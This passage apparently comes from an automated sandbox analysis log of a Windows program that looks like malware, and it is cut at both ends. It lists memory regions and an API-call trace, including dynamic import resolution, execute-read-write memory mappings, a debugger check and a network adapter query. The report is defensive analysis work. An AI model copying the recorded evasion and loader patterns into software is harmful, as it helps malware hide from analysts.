"c:\\windows\\syswow64\\ws2_32.dll") Region: id = 734 start_va = 0x420000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 735 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 736 start_va = 0x24e0000 end_va = 0x27aefff entry_point = 0x24e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 737 start_va = 0x74620000 end_va = 0x74677fff entry_point = 0x74620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 793 start_va = 0x745d0000 end_va = 0x7461efff entry_point = 0x745d0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 835 start_va = 0x74850000 end_va = 0x74861fff entry_point = 0x74850000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 853 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 854 start_va = 0x2910000 end_va = 0x2a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 855 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 856 start_va = 0x74c80000 end_va = 0x74c8ffff entry_point = 0x74c80000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 897 start_va = 0x2a10000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 898 start_va = 0x2a10000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 899 start_va = 0x2be0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 911 start_va = 0x74960000 end_va = 0x7496ffff entry_point = 0x74960000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 923 start_va = 0x74940000 end_va = 0x74951fff entry_point = 0x74940000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 943 start_va = 0x747a0000 end_va = 0x747dbfff entry_point = 0x747a0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 944 start_va = 0x74c30000 end_va = 0x74c73fff entry_point = 0x74c30000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 945 start_va = 0xc00000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 946 start_va = 0x74c20000 end_va = 0x74c27fff entry_point = 0x74c20000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 947 start_va = 0x74be0000 end_va = 0x74c17fff entry_point = 0x74be0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 961 start_va = 0x27b0000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 962 start_va = 0x74a00000 end_va = 0x74a05fff entry_point = 0x74a00000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 963 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 964 start_va = 0x150000 end_va = 0x157fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 965 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 966 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 967 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 968 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 969 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 970 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 971 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 972 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 973 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 974 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 975 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 976 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 977 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 978 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 979 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 980 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 981 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 982 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 983 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 984 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 985 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 986 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 987 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 988 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 989 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 990 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 991 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 992 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 993 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 994 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 995 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 996 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 997 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 998 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 999 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1000 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1001 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1002 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1003 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1004 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1005 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1006 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1007 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1008 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1009 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1010 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1011 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1012 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1013 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1014 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1015 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1016 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1017 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1018 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1019 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1020 start_va = 0x100000 end_va = 0x107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1021 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1022 start_va = 0x2a10000 end_va = 0x2e02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Region: id = 1023 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1024 start_va = 0xc00000 end_va = 0xcbffff entry_point = 0xc00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1025 start_va = 0xcc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1026 start_va = 0x74c10000 end_va = 0x74c25fff entry_point = 0x74c10000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1027 start_va = 0x74c80000 end_va = 0x74c87fff entry_point = 0x74c80000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1028 start_va = 0x74bf0000 end_va = 0x74c2bfff entry_point = 0x74bf0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1029 start_va = 0x27b0000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1030 start_va = 0x74be0000 end_va = 0x74be4fff entry_point = 0x74be0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1031 start_va = 0x749f0000 end_va = 0x749f5fff entry_point = 0x749f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1032 start_va = 0x430000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1033 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1034 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1035 start_va = 0x2e70000 end_va = 0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 1036 start_va = 0x2ff0000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1037 start_va = 0x749b0000 end_va = 0x749e7fff entry_point = 0x749b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1038 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1039 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1040 start_va = 0x3210000 end_va = 0x324ffff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 1041 start_va = 0x74990000 end_va = 0x749a0fff entry_point = 0x74990000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1042 start_va = 0x74980000 end_va = 0x74988fff entry_point = 0x74980000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1043 start_va = 0x74960000 end_va = 0x74978fff entry_point = 0x74960000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1044 start_va = 0x74950000 end_va = 0x7495efff entry_point = 0x74950000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1045 start_va = 0x74940000 end_va = 0x7494efff entry_point = 0x74940000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1046 start_va = 0x74920000 end_va = 0x74931fff entry_point = 0x74920000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Thread: id = 28 os_tid = 0xae8 Thread: id = 29 os_tid = 0xaec Thread: id = 30 os_tid = 0xaf0 [0027.452] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x759f0000 [0027.452] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0027.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74bb202c, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x44 Thread: id = 31 os_tid = 0xaf4 [0027.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe2fbf0, cbMultiByte=-1, lpWideCharStr=0xe2fc20, cchWideChar=100 | out: lpWideCharStr="Global") returned 7 [0027.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe2fbf8, cbMultiByte=-1, lpWideCharStr=0xe2fc2c, cchWideChar=94 | out: lpWideCharStr="\\{30B34ED7-A8B6-40EE-94E3-3C1AAAE4E759}") returned 40 [0027.480] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x759f0000 [0027.480] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0027.480] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Global\\{30B34ED7-A8B6-40EE-94E3-3C1AAAE4E759}") returned 0x9c [0027.489] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x40, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15000, lpName=0x0) returned 0x98 [0027.489] MapViewOfFile (hFileMappingObject=0x98, dwDesiredAccess=0x22, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15000) returned 0x70000 [0027.490] GetModuleHandleA (lpModuleName="msvcrt.dll") returned 0x752a0000 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_fileno") returned 0x752aac15 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="__pioinfo") returned 0x75340500 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_write") returned 0x752b4078 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_isatty") returned 0x752af383 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="__badioinfo") returned 0x75343210 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="ferror") returned 0x752b4947 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="wctomb") returned 0x752f22b7 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_itoa") returned 0x752c4218 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_snprintf") returned 0x752cfa7c [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="_iob") returned 0x75342900 [0027.490] GetProcAddress (hModule=0x752a0000, lpProcName="isleadbyte") returned 0x752af76e [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="__mb_cur_max") returned 0x75343148 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="mbtowc") returned 0x752aacdf [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="_amsg_exit") returned 0x7530b2ef [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="_initterm") returned 0x752ac151 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="free") returned 0x752a9894 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="malloc") returned 0x752a9cee [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="_XcptFilter") returned 0x752cdc75 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="memcpy") returned 0x752a9910 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="memset") returned 0x752a9790 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="printf") returned 0x752bc5b9 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="wcsstr") returned 0x752abf71 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="strstr") returned 0x752ade4a [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="memmove") returned 0x752a9e5a [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="??2@YAPAXI@Z") returned 0x752ab0c9 [0027.491] GetProcAddress (hModule=0x752a0000, lpProcName="??3@YAXPAX@Z") returned 0x752ab0b9 [0027.492] GetProcAddress (hModule=0x752a0000, lpProcName="_wcslwr") returned 0x752afb25 [0027.492] GetProcAddress (hModule=0x752a0000, lpProcName="_errno") returned 0x752aa5b8 [0027.492] GetProcAddress (hModule=0x752a0000, lpProcName="_lseeki64") returned 0x752b4303 [0027.492] GetProcAddress (hModule=0x752a0000, lpProcName="__CxxFrameHandler") returned 0x752c3495 [0027.492] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x759f0000 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTimeAsFileTime") returned 0x75a03509 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThreadId") returned 0x75a01450 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="QueryPerformanceCounter") returned 0x75a01725 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="SetUnhandledExceptionFilter") returned 0x75a087c9 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="UnhandledExceptionFilter") returned 0x75a2772f [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0027.492] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateProcess") returned 0x75a1d802 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedCompareExchange") returned 0x75a01484 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="RtlUnwind") returned 0x75a2d1c3 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="OutputDebugStringA") returned 0x75a2b2b7 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryExA") returned 0x75a04913 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleA") returned 0x75a01245 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileMappingA") returned 0x75a05506 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="UnmapViewOfFile") returned 0x75a01826 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="MapViewOfFile") returned 0x75a018f1 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="IsDebuggerPresent") returned 0x75a04a5d [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0027.493] GetProcAddress (hModule=0x759f0000, lpProcName="GetShortPathNameA") returned 0x75a2594d [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileW") returned 0x75a03f5c [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemDirectoryA") returned 0x75a1b66c [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryW") returned 0x75a04259 [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSize") returned 0x75a0196e [0027.494] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0027.494] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x756e0000 [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExA") returned 0x756f48ef [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExA") returned 0x756f4907 [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExA") returned 0x756f14b3 [0027.494] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0027.495] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75c50000 [0027.495] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetSpecialFolderPathW") returned 0x75c70468 [0027.495] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetSpecialFolderPathA") returned 0x75e9fb26 [0027.495] GetModuleHandleA (lpModuleName="iphlpapi.dll") returned 0x0 [0027.495] GetLastError () returned 0x7e [0027.495] LoadLibraryExA (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x8) returned 0x74c90000 [0027.813] GetProcAddress (hModule=0x74c90000, lpProcName="GetAdaptersInfo") returned 0x74c99263 [0027.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe2fb88 | out: lpSystemTimeAsFileTime=0xe2fb88*(dwLowDateTime=0x9a7a5e0, dwHighDateTime=0x1d3949b)) [0027.813] GetCurrentProcessId () returned 0xae4 [0027.813] GetCurrentThreadId () returned 0xaf4 [0027.813] GetTickCount () returned 0x1695c [0027.813] QueryPerformanceCounter (in: lpPerformanceCount=0xe2fb80 | out: lpPerformanceCount=0xe2fb80*=357660808) returned 1 [0027.813] IsDebuggerPresent () returned 0 [0027.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7120f, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa0 [0027.821] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x40, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16000, lpName=0x0) returned 0xa4 [0027.821] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x22, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16000) returned 0x90000 [0027.822] GetModuleHandleA (lpModuleName="msvcrt.dll") returned 0x752a0000 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_isatty") returned 0x752af383 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_write") returned 0x752b4078 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_lseeki64") returned 0x752b4303 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_fileno") returned 0x752aac15 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="__pioinfo") returned 0x75340500 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="__badioinfo") returned 0x75343210 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="ferror") returned 0x752b4947 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="wctomb") returned 0x752f22b7 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_itoa") returned 0x752c4218 [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_snprintf") returned 0x752cfa7c [0027.822] GetProcAddress (hModule=0x752a0000, lpProcName="_iob") returned 0x75342900 [0027.822] GetProcAddress 